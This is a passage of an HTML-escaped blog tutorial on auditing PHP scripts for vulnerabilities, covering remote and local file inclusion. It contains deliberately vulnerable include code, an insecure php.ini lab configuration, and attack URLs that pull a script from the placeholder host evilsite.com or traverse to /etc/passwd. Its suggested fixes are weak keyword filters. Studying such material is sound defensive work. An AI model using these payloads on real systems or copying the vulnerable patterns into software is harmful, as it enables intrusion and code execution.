Bypass&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6.3 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;7) Insecure Cookie Handling&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;7.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;7.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;7.2 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8) Remote Command Execution&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8.2 – Advanced example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8.3 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;9) Remote Code Execution&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;9.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;9.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;9.2 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;10) Cross-Site Scripting&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;10.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;10.1 – Another example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;10.2 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;10.3 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;11) Authentication Bypass&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;11.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;11.1 – Via login variable&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;11.2 – Unprotected Admin CP&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;11.3 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12) Insecure Permissions&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12.1 – Read the users/passwords&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12.2 – Download backups&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12.3 – INC files&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12.4 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;13) Cross Site Request Forgery&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;13.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;13.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;13.2 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;Let&#39;s get star&lt;span style=&quot;font-size: large;&quot;&gt;ted..!!&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;1)&lt;b&gt; In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;examples without the basic example of each category was founded in different scripts.&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;2) First,install Apache,PHP and MySQL on your&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;computer.Addionally you can install phpMyAdmin.&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;You can install WAMP server for example,it has all in one..Most&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;vulnerabilities need special conditions to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what configuration I use and why :&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;safe_mode = off ( a lot of shit cannot be done with this on )&lt;br /&gt;disabled_functions = N/A ( no one,we want all )&lt;br /&gt;register_globals = on ( we can set variables by request )&lt;br /&gt;allow_url_include = on ( for lfi/rfi )&lt;br /&gt;allow_url_fopen = on ( for lfi/rfi )&lt;br /&gt;magic_quotes_gpc = off ( this will escape ‘ “&amp;nbsp; \&amp;nbsp; and NUL’s&amp;nbsp; with a backslash and we don’t want that )&lt;br /&gt;short_tag_open = on ( some scripts are using short tags,better on )&lt;br /&gt;file_uploads = on ( we want to upload )&lt;br /&gt;display_errors = on ( we want to see the script errors,maybe some undeclared variables? )&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;How to proceed:&lt;/b&gt;&lt;/span&gt;&amp;nbsp; &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;First,create a database to be used by different scripts.Install the script on localhost and start the audit over the source code.If you found something open the web browser and&lt;br /&gt;test it,maybe you are wrong.&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;3) Remote File Inclusion&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-Tips&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;:&lt;/span&gt;&amp;nbsp; &lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;You can use the NULLBYTE and ? trick. You can use HTTPS and FTP to bypass filters ( http filtered )&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;In PHP is 4 functions through you can include code. &lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;require –&amp;nbsp; require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.&lt;br /&gt;require_once – is identical to require() except PHP will check if the  file has already been included, and if so, not include (require) it  again.&lt;br /&gt;include – includes and evaluates the specified file.&lt;br /&gt;include_once -&amp;nbsp; includes and evaluates the specified file during the execution of the script.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3.0 – Basic example&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips :&lt;/b&gt;&lt;b&gt;&lt;i&gt; some scripts don’t accept “http” in variables,”http” word is forbbiden so&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;you can use “https” or “ftp”.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;- Code snippet from test.php&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;br /&gt;$pagina=$_GET[&#39;pagina&#39;];&lt;br /&gt;include $pagina;&lt;br /&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;- If we access the page we got some errors and some warnings( not pasted ) :&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Notice:&lt;/span&gt;&lt;/b&gt; &lt;i&gt;&lt;b&gt;Undefined index: pagina in C:\wamp\www\test.php on line 2&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;- We can see here that “pagina” variable is undeclared.We can set any value to “pagina” variable.Example :&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;   &lt;b&gt;&lt;i&gt;Now I will show why some people use ? and  after the link to the evil script.&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;   &lt;b&gt;&lt;i&gt;# The “″&lt;/i&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&amp;lt;?php&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$pagina=$_GET[&#39;pagina&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;include $pagina.’.php’;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;?&amp;gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- So if we will request&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Will not work because the script will try to include http://evilsite.com/evilscript.txt.php&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;So we will add a NULLBYTE (  ) and all the shit after nullbyte will not be taken in&lt;br /&gt;consideration.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The script will successfully include our evilscript and will throw to junk the things&lt;br /&gt;after the nullbyte.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;# The “?”&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;- Code snippet from test.php&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;?php&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;$pagina=$_GET[&#39;pagina&#39;];&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;include $pagina.’logged=1′;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;And the logged=1 will become like a variable.But better use nullbyte.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The evilscript will be included succesfully.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;3.1 – Simple example&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Now an example from a script.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from index.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;if (isset($_REQUEST[&quot;main_content&quot;])){&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;$main_content = $_REQUEST[&quot;main_content&quot;];&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;} else if (isset($_SESSION[&quot;main_content&quot;])){&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;$main_content = $_SESSION[&quot;main_content&quot;];&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;}&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;…………………..etc………………&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;ob_start();&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;require_once($main_content);&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We can see that “main_content” variable is requested by $_REQUEST method.The attacker can&lt;br /&gt;set any value that he want. Below the “main_content” variable is include.So if we make the&lt;br /&gt;following request :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Our evil script will be successfully included.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3.2 – How to fix&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Simple way : Don’t allow special chars in variables.Simple way : filter the slash “/” .&lt;br /&gt;Another way : filter “http” , “https” , “ftp” and “smb”.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4) Local File Inclusion&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips : &lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;You can use the NULLBYTE and ? trick.&lt;br /&gt;../ mean a directory up&lt;br /&gt;On Windows systems we can use “..\” instead of “../” .The “..\” will become “..%5C” ( urlencoded ).&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;The same functions which let you to include (include,include_once,require,require_once) .&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;4.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;- Code snippet from test.php&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;?php&lt;br /&gt;$pagina=$_GET[&#39;pagina&#39;];&lt;br /&gt;include ‘/pages/’.$pagina;&lt;br /&gt;?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;Now,we can not include our script because we can not include remote files.We can include only&lt;br /&gt;local files as you see.So if we make the following request :&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;The script will include “/pages/../../../../../../etc/passwd” successfully.&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;You can use the  and ? .The same story.&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;4.1 – Simple example&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;- Code snippet from install/install.php&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;if(empty($_GET[&quot;url&quot;]))&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;$url = ‘step_welcome.php’;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;else&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;$url = $_GET[&quot;url&quot;];&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;………….etc………….&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;p&amp;gt;&amp;lt;? include(‘step/’.$url) ?&amp;gt;&amp;lt;/p&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;We can see that “url” variable is injectable.If the “url” variable is not set&lt;br /&gt;(is empty) the script will include “step_welcome.php” else will include the&lt;br /&gt;variable set by the attacker.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;So if we do the following request :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: 